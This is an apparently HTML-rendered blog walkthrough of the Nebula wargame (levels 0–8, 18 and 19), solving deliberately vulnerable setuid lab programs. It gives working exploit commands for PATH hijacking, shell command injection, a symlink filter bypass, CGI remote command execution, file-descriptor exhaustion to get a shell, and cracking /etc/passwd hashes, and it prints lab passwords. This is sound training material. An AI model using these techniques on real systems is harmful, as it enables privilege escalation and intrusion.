<li>effective user id (euid): Is used for access checks (like opening a file). Also used for files created. This represents
the actual capabilities of the process.</li>
<li>real user id (ruid): The users id of the process owner. When there is no setuid/setgid bit set on the process, it's the same
as the user who invoked the process.</li>
<li>saved user id (suid): Variable to keep track of the original user id. Used to lower privileges and remember them for later use.</li>
</ul>
<p>So the above calls to <code>setresgid()</code> set all of this different id's to the same value: the effective user/group id.</p>
<h4>The hard way - buffer overflow</h4>
<p>There is a buffer overflow in the function <code>setuser()</code>. There the a buffer with length 128 is formatted
with unbound user input data:</p>
<div class="highlight"><pre><span></span><code><span class="kt">char</span><span class="w"> </span><span class="n">msg</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span><span class="w"></span>
<span class="n">sprintf</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span><span class="w"> </span><span class="s">"unable to set user to '%s' -- not supported.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">user</span><span class="p">);</span><span class="w"></span>
</code></pre></div>
<p>To trigger the overrun, call it like this:</p>
<div class="highlight"><pre><span></span><code>python -c <span class="s1">'print "setuser " + 150 * "A"'</span> <span class="p">|</span> ./flag18 -vvvvv -d /tmp/dbg
</code></pre></div>
<h4>Format string vulnearabilities</h4>
<p>Then there is the function:</p>
<div class="highlight"><pre><span></span><code><span class="kt">void</span><span class="w"> </span><span class="nf">notsupported</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">what</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">buffer</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">asprintf</span><span class="p">(</span><span class="o">&</span><span class="n">buffer</span><span class="p">,</span><span class="w"> </span><span class="s">"--> [%s] is unsupported at this current time.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">what</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">dprintf</span><span class="p">(</span><span class="n">what</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>which can be used to exploit format string vulnearabilities. An example might be to enter the following
after having called flag18 with <code>./flag18 -vvvvv -d /dev/tty</code>:</p>
<div class="highlight"><pre><span></span><code>site <span class="nb">exec</span> %s%s%s%s%s%s%s%s%s
got <span class="o">[</span>site <span class="nb">exec</span> %s%s%s%s%s%s%s%s%s<span class="o">]</span> as input
F<~F<F<u<span class="err">'</span>VHBBu,OOOOOOOPgot <span class="o">[</span>%s<span class="o">]</span> as input
,--> <span class="o">[</span>%s%s%s%s%s%s%s%s%s<span class="o">]</span> is unsupported at this current time.
</code></pre></div>
<h4>The solution</h4>
<p>All of this attacks are either not feasable or are hard to mount (especially the memory corruption attacks).
So after having spent some hours on this level18, I couldn't come up with a solution and looked on
other writeups in the internet, where I found the solution at <a href="http://louisrli.github.io/blog/2012/08/17/nebula2/#.Vh-KfR93lhE">http://louisrli.github.io/blog/2012/08/17/nebula2/#.Vh-KfR93lhE</a>.</p>
<p>The idea is to make <code>fopen()</code> fail. I saw earlier that the <code>globals.loggedin = 1;</code> is outside of the if statement
and that it would be executed when <code>fopen()</code> fails. But it didn't occur to me that <code>fopen()</code> will fail after
there are no more file descriptors left and that we can <em>actually open file descriptors in ./flag18</em> by sending
enough <strong>login foo</strong> commands. Fist check the soft limit of maximum open fds:</p>
<div class="highlight"><pre><span></span><code>level18@nebula:/home/flag18$ <span class="nb">ulimit</span> -Sn
<span class="m">1024</span>
</code></pre></div>
<p>Then create a file with 1025 'login' commands followd by a 'closelog' and 'shell' command. The closelog
will free one more filedescriptor such that the <code>execvp()</code> syscall will succeed.</p>
<div class="highlight"><pre><span></span><code>python -c <span class="s1">'open("/home/level18/flood", "w").write("login foo\n"*1025 + "closelog\n" + "shell\n")'</span>
</code></pre></div>
<p>Then exploit the <code>./flag18</code> binary:</p>
<div class="highlight"><pre><span></span><code>cat ~/flood <span class="p">|</span> ./flag18 --init-file /foo -d /dev/tty -vvvvv
</code></pre></div>
<p>Because <code>execve("/bin/sh", argv, envp);</code> will call the shell with all args supplied here, we need
a argument which ignores them (the job of <code>--init-file</code>).</p>
<p>This will yield a shell and we are done!</p>
<h4>Sidenote</h4>
<p>Actually the code is misleading. In assumed that every fd will be closed in the <code>login()</code> function:</p>
<div class="highlight"><pre><span></span><code><span class="kt">void</span><span class="w"> </span><span class="nf">login</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">pw</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">FILE</span><span class="w"> </span><span class="o">*</span><span class="n">fp</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">fp</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fopen</span><span class="p">(</span><span class="n">PWFILE</span><span class="p">,</span><span class="w"> </span><span class="s">"r"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">fp</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">file</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">fgets</span><span class="p">(</span><span class="n">file</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">file</span><span class="p">)</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">fp</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">dprintf</span><span class="p">(</span><span class="s">"Unable to read password file %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">PWFILE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">fclose</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">pw</span><span class="p">,</span><span class="w"> </span><span class="n">file</span><span class="p">)</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="k">return</span><span class="p">;</span><span class="w"> </span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">dprintf</span><span class="p">(</span><span class="s">"logged in successfully (with%s password file)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="n">fp</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"out"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">""</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">globals</span><span class="p">.</span><span class="n">loggedin</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Because if <code>fopen()</code> is opened and the contents are read, we immediately close it again. But apparantly
this doesn't somehow happen and the fds stay open. Why?</p>
<h2>Level 19 - Zombie Processes belong to init!</h2>
<p>In level 19 we have a setuid C program that first creates a path to the <code>procfs</code> of its parent
process: <code>snprintf(buf, sizeof(buf)-1, "/proc/%d", getppid());</code>.</p>
<p>We need to achieve that <code>stat()</code> returns <code>st_uid == 0</code> for the created file. This is only possible if the
parent process /proc/pid directory is owned by the root user.</p>
<p>I didn't solve this level on my own and peeked at the solution at <>. The basic idea is to make use of
the default behaviour of unix processes, that they are reassigned to the init process, when its parent process
exits before the child process stops. </p>
<p>So the idea is to create a program that <code>forks</code>, wait's until the parent process dies (by calling <code>sleep</code>) and finally
calls the <code>/home/flag19/flag19</code> setuid binary with <code>execve()</code>.</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><unistd.h></span><span class="cp"></span>
<span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">envp</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">childPID</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fork</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">childPID</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// forked</span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">childPID</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// child</span>
<span class="w"> </span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">setresuid</span><span class="p">(</span><span class="n">geteuid</span><span class="p">(),</span><span class="n">geteuid</span><span class="p">(),</span><span class="n">geteuid</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">args</span><span class="p">[]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">{</span><span class="s">"/bin/sh"</span><span class="p">,</span><span class="w"> </span><span class="s">"-c"</span><span class="p">,</span><span class="w"> </span><span class="s">"/bin/getflag"</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">};</span><span class="w"></span>
<span class="w"> </span><span class="n">execve</span><span class="p">(</span><span class="s">"/home/flag19/flag19"</span><span class="p">,</span><span class="w"> </span><span class="n">args</span><span class="p">,</span><span class="w"> </span><span class="n">envp</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>Nebula Wargame walkthrough Level 0-92015-09-28T23:52:00+02:002015-09-28T23:52:00+02:00Nikolai Tschachertag:incolumitas.com,2015-09-28:/2015/09/28/nebula-wargame-walkthrough-level-0-9/<p>In this blog post we will walk through the solutions of the levels 0 to 9 of the <em>Nebula</em> wargame, which is
hosted on <a href="http://exploit-exercises.com">http://exploit-exercises.com</a>. This writeup will force me to memorize commands better and exercise a bit. I fear that this writeup is of
no use for other people, since you hopefully want to solve those exercises on your own :)</p>
<h3>Level 0 - Finding setuid programs in the filesystem</h3>
<p>As the descriptions states you need to find a setuid binary that gets a shell for the <em>flag00</em> user.
We can find setuid executables with a command such as the following:</p>
<p><code>find / -type f -perm -4000 -user flag00 2>/dev/null</code></p>
<p>This command suppresses error messages (The <code>2>/dev/null</code> part redirects error output to /dev/null).
Furthermore the <code>-perm -4000</code> flag is responsible for </p>
<div class="highlight"><pre><span></span><code>All of the permission bits mode are set for the file. Symbolic modes are accepted in this form, and this is usually the way in which would want to use
them. You must specify `u', `g' or `o' if you use a symbolic mode. See the EXAMPLES section for some illustrative examples.
</code></pre></div>
<p>Now execute the found binary and run <code>getflag</code> and you should be …</p><p>In this blog post we will walk through the solutions of the levels 0 to 9 of the <em>Nebula</em> wargame, which is
hosted on <a href="http://exploit-exercises.com">http://exploit-exercises.com</a>. This writeup will force me to memorize commands better and exercise a bit. I fear that this writeup is of
no use for other people, since you hopefully want to solve those exercises on your own :)</p>
<h3>Level 0 - Finding setuid programs in the filesystem</h3>
<p>As the descriptions states you need to find a setuid binary that gets a shell for the <em>flag00</em> user.
We can find setuid executables with a command such as the following:</p>
<p><code>find / -type f -perm -4000 -user flag00 2>/dev/null</code></p>
<p>This command suppresses error messages (The <code>2>/dev/null</code> part redirects error output to /dev/null).
Furthermore the <code>-perm -4000</code> flag is responsible for </p>
<div class="highlight"><pre><span></span><code>All of the permission bits mode are set for the file. Symbolic modes are accepted in this form, and this is usually the way in which would want to use
them. You must specify `u', `g' or `o' if you use a symbolic mode. See the EXAMPLES section for some illustrative examples.
</code></pre></div>
<p>Now execute the found binary and run <code>getflag</code> and you should be done.</p>
<h2>Level 1 - Exploiting PATH vulnerabilities</h2>
<p>This level is also really easy. We need to trick the following code to run the program <code>getflag</code> with id <code>flag01</code>:</p>
<div class="highlight"><pre><span></span><code><span class="n">include</span><span class="w"> </span><span class="o"><</span><span class="n">stdlib</span><span class="p">.</span><span class="n">h</span><span class="o">></span><span class="w"></span>
<span class="n">include</span><span class="w"> </span><span class="o"><</span><span class="n">unistd</span><span class="p">.</span><span class="n">h</span><span class="o">></span><span class="w"></span>
<span class="n">include</span><span class="w"> </span><span class="o"><</span><span class="n">string</span><span class="p">.</span><span class="n">h</span><span class="o">></span><span class="w"></span>
<span class="n">include</span><span class="w"> </span><span class="o"><</span><span class="n">sys</span><span class="o">/</span><span class="n">types</span><span class="p">.</span><span class="n">h</span><span class="o">></span><span class="w"></span>
<span class="n">include</span><span class="w"> </span><span class="o"><</span><span class="n">stdio</span><span class="p">.</span><span class="n">h</span><span class="o">></span><span class="w"></span>
<span class="kt">int</span><span class="w"> </span><span class="n">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">envp</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">gid_t</span><span class="w"> </span><span class="n">gid</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">uid_t</span><span class="w"> </span><span class="n">uid</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">gid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">getegid</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="n">uid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">geteuid</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="n">setresgid</span><span class="p">(</span><span class="n">gid</span><span class="p">,</span><span class="w"> </span><span class="n">gid</span><span class="p">,</span><span class="w"> </span><span class="n">gid</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">setresuid</span><span class="p">(</span><span class="n">uid</span><span class="p">,</span><span class="w"> </span><span class="n">uid</span><span class="p">,</span><span class="w"> </span><span class="n">uid</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">system</span><span class="p">(</span><span class="s">"/usr/bin/env echo and now what?"</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>As we all now <code>/usr/bin/env</code> executes a program with the current environment. And the environment includes the
<code>$PATH</code> variable that specifies where programs can be found, such that users don't need to execute the whole path.</p>
<p>Of course we can set the PATH variable to some folder and include a program there which is called <code>echo</code>.</p>
<div class="highlight"><pre><span></span><code>mkdir /tmp/bin
<span class="nb">echo</span> -e <span class="s1">'#!/bin/bash\necho "executing with id $(id)";\ngetflag'</span> > /tmp/bin/echo <span class="o">&&</span> chmod +x /tmp/bin/echo
<span class="nv">PATH</span><span class="o">=</span>/tmp/bin/:<span class="nv">$PATH</span>
level01@nebula:/home/flag01$ ./flag01
executing with id <span class="nv">uid</span><span class="o">=</span><span class="m">998</span><span class="o">(</span>flag01<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span><span class="m">1002</span><span class="o">(</span>level01<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span><span class="m">998</span><span class="o">(</span>flag01<span class="o">)</span>,1002<span class="o">(</span>level01<span class="o">)</span>
You have successfully executed getflag on a target account
</code></pre></div>
<h2>Level 2 - Command Injection in setuid C programs</h2>
<p>Level 2 is very easy. The vulnerability is a basic command injection flag. When you see the following lines
in the code:</p>
<div class="highlight"><pre><span></span><code><span class="n">buffer</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="n">asprintf</span><span class="p">(</span><span class="o">&</span><span class="n">buffer</span><span class="p">,</span><span class="w"> </span><span class="s">"/bin/echo %s is cool"</span><span class="p">,</span><span class="w"> </span><span class="n">getenv</span><span class="p">(</span><span class="s">"USER"</span><span class="p">));</span><span class="w"></span>
<span class="n">printf</span><span class="p">(</span><span class="s">"about to call system(</span><span class="se">\"</span><span class="s">%s</span><span class="se">\"</span><span class="s">)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">buffer</span><span class="p">);</span><span class="w"></span>
<span class="n">system</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span><span class="w"></span>
</code></pre></div>
<p>it becomes clear how to call <code>getflag</code> on the target account:</p>
<div class="highlight"><pre><span></span><code>level02@nebula:/home/flag02$ <span class="nv">USER</span><span class="o">=</span><span class="s1">'; getflag; echo'</span>
level02@nebula:/home/flag02$ ./flag02
about to call system<span class="o">(</span><span class="s2">"/bin/echo ; getflag; echo is cool"</span><span class="o">)</span>
You have successfully executed getflag on a target account
is cool
</code></pre></div>
<p>I just ended the current command with <code>;</code> and appended our own command and
closed it again with the original <code>echo</code> statement.</p>
<h2>Level 3 - Exploiting cronjobs</h2>
<p><strong>NOT SOLVED YET</strong></p>
<p>In Level 3 we can write in the home directory and create our own executable scripts.
These are executed with a cronjob script that looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/bin/sh</span>
<span class="k">for</span> i <span class="k">in</span> /home/flag03/writable.d/* <span class="p">;</span> <span class="k">do</span>
<span class="o">(</span><span class="nb">ulimit</span> -t <span class="m">5</span><span class="p">;</span> bash -x <span class="s2">"</span><span class="nv">$i</span><span class="s2">"</span><span class="o">)</span>
rm -f <span class="s2">"</span><span class="nv">$i</span><span class="s2">"</span>
<span class="k">done</span>
</code></pre></div>
<p>We need to consider the <code>ulimit -t5</code> call that sets a user limit:</p>
<p>The <code>bash -x</code> will I simply created a small script in <code>writeable.d</code> and added a file <code>test.sh</code> with the following
contents:</p>
<div class="highlight"><pre><span></span><code>getflag
</code></pre></div>
<h2>Level 4 - Bypassing filters with symlinks</h2>
<p>This level requires us to read a file token in the <code>/home/flag04</code> directory which we cannot access.
But there is a setuid binary that runs with euid flag04 with the following code:</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdlib.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><unistd.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><string.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><sys/types.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><fcntl.h></span><span class="cp"></span>
<span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">envp</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">buf</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="n">rc</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">argc</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"%s [file to read]</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strstr</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="w"> </span><span class="s">"token"</span><span class="p">)</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"You may not access '%s'</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">fd</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">open</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="w"> </span><span class="n">O_RDONLY</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">fd</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">err</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">,</span><span class="w"> </span><span class="s">"Unable to open %s"</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">rc</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">rc</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">err</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">,</span><span class="w"> </span><span class="s">"Unable to read fd %d"</span><span class="p">,</span><span class="w"> </span><span class="n">fd</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">rc</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>To bypass it, we simple create a symbolic link to the token file.
The <code>read()</code> function apparently resolves symbolic links: </p>
<div class="highlight"><pre><span></span><code>level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/bla
level04@nebula:/home/flag04$ ./flag04 /tmp/bla
06508b5e-8909-4f38-b630-fdb148a848a2
level04@nebula:/home/flag04$ su flag04
Password:
sh-4.2$ getflag
You have successfully executed getflag on a target account
</code></pre></div>
<h2>Level 5 - Reading sensitive backup files to exploit accounts</h2>
<p>When you change to the directory of <code>flag05</code> you can immediately see a suspicious directory named
<code>.backup</code>. There you'll find a <code>tar.gz</code> file. When you decompress and untar it, you'll see that
it contains the credentials for a ssh connection. After some tries, you'll see that you may
login to the flag05 account with the private key (contained in <code>.ssh/id_rsa</code>).</p>
<div class="highlight"><pre><span></span><code><span class="c1"># This command creates a temporary directory and unpacks the .tgz file there. Then it logs in with the</span>
<span class="c1"># id_rsa key which was in the compressed tar archive.</span>
<span class="nv">TEMPDIR</span><span class="o">=</span><span class="k">$(</span>mktemp -d<span class="k">)</span> <span class="o">&&</span> tar -xzvf .backup/backup-19072011.tgz -C <span class="nv">$TEMPDIR</span> <span class="o">&&</span> ssh -i <span class="nv">$TEMPDIR</span>/.ssh/id_rsa flag05@localhost <span class="s1">'getflag'</span>
</code></pre></div>
<h2>Level 6 - Cracking crypt(3)</h2>
<p>This one is fairly easy. As the level description states:</p>
<blockquote>
<p>The flag06 account credentials came from a legacy unix system. </p>
</blockquote>
<p>This just means that the hashed passwords are still stored in <code>/etc/passwd</code> and that they are hashed with
<code>crypt(3)</code>.</p>
<p>So I installed a password cracking program named <em>john</em> and downloaded the <code>/etc/passwd</code> file from nebula to my
host machine. </p>
<div class="highlight"><pre><span></span><code>scp level06@nebula:/etc/passwd passwd
</code></pre></div>
<p>Then I called john with the password file which yielded the password immediately:</p>
<div class="highlight"><pre><span></span><code>nikolai@nikolai:~/Projects/private/wargames/exploit-exercises/nebula$ john passwd
Loaded <span class="m">1</span> password <span class="nb">hash</span> <span class="o">(</span>descrypt, traditional crypt<span class="o">(</span><span class="m">3</span><span class="o">)</span> <span class="o">[</span>DES <span class="m">128</span>/128 SSE2-16<span class="o">])</span>
Press <span class="s1">'q'</span> or Ctrl-C to abort, almost any other key <span class="k">for</span> status
hello <span class="o">(</span>flag06<span class="o">)</span>
1g <span class="m">0</span>:00:00:00 <span class="m">100</span>% <span class="m">2</span>/3 <span class="m">11</span>.11g/s 8366p/s 8366c/s 8366C/s <span class="m">123456</span>..marley
Use the <span class="s2">"--show"</span> option to display all of the cracked passwords reliably
Session completed
</code></pre></div>
<p>Well the password is <strong>hello</strong> :)</p>
<div class="highlight"><pre><span></span><code><span class="c1"># enter the password 'hello'</span>
ssh flag06@nebula <span class="s1">'getflag'</span>
flag06@nebula<span class="err">'</span>s password:
You have successfully executed getflag on a target account
</code></pre></div>
<h2>Level 7 - RCE exploit in cgi files</h2>
<p>This one is quite easy. You can immediately see that there is a <strong>cgi perl</strong> script in the <code>flag07</code> directory
that exposes ping.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/perl</span>
<span class="k">use</span> <span class="nn">CGI</span> <span class="sx">qw{param}</span><span class="p">;</span>
<span class="k">print</span> <span class="s">"Content-type: text/html\n\n"</span><span class="p">;</span>
<span class="k">sub</span> <span class="nf">ping</span> <span class="p">{</span>
<span class="nv">$host</span> <span class="o">=</span> <span class="nv">$_</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="k">print</span><span class="p">(</span><span class="s">"<html><head><title>Ping results</title></head><body><pre>"</span><span class="p">);</span>
<span class="nv">@output</span> <span class="o">=</span> <span class="sb">`ping -c 3 $host 2>&1`</span><span class="p">;</span>
<span class="k">foreach</span> <span class="nv">$line</span> <span class="p">(</span><span class="nv">@output</span><span class="p">)</span> <span class="p">{</span> <span class="k">print</span> <span class="s">"$line"</span><span class="p">;</span> <span class="p">}</span>
<span class="k">print</span><span class="p">(</span><span class="s">"</pre></body></html>"</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1"># check if Host set. if not, display normal page, etc</span>
<span class="n">ping</span><span class="p">(</span><span class="n">param</span><span class="p">(</span><span class="s">"Host"</span><span class="p">));</span>
</code></pre></div>
<p>Then you can access the cgi bin over a browser and simply inject some command into
the script. You need to inspect <code>thttpd.conf</code> config file for the httpd to see on which port the
web server is listeingn (7007).
Then I did the following:</p>
<div class="highlight"><pre><span></span><code>http://192.168.56.101:7007/index.cgi?Host<span class="o">=</span><span class="k">$(</span>getflag > /tmp/getflag<span class="k">)</span>
</code></pre></div>
<p>and then you can see that getflag was executed when you open it with level07:</p>
<div class="highlight"><pre><span></span><code>level07@nebula:/home/flag07$ cat /tmp/getflag
You have successfully executed getflag on a target account
</code></pre></div>
<h2>Level 8 - Reading and understanding pcap files!</h2>
<p>This level was quite tricky and a lot of fun to solve. You can find a file named <code>capture.pcap</code> in
the <code>flag08</code> directory. Download it to your host (with scp for instance) and open the pcap file with wireshark:</p>
<div class="highlight"><pre><span></span><code>wireshark -r capture.pcap
</code></pre></div>
<p>Then right click on a packet and select <em>Follow TCP Stream</em>. You will see something like the following:</p>
<p><img alt="wireshark screenshot" src="https://incolumitas.com/images/nebula_level08.png"> </p>
<p>We can see that we captured the network streams of someone trying to loging in with username <em>level08</em> and
a password with some special chars in it: <code>0x7f</code>. A quick lookup in a ascii table confirms that the ascii code
at 0x7f is a control code for the <em>DEL(delete)</em> character. So the overall password is: <strong>backd00Rmate</strong></p>
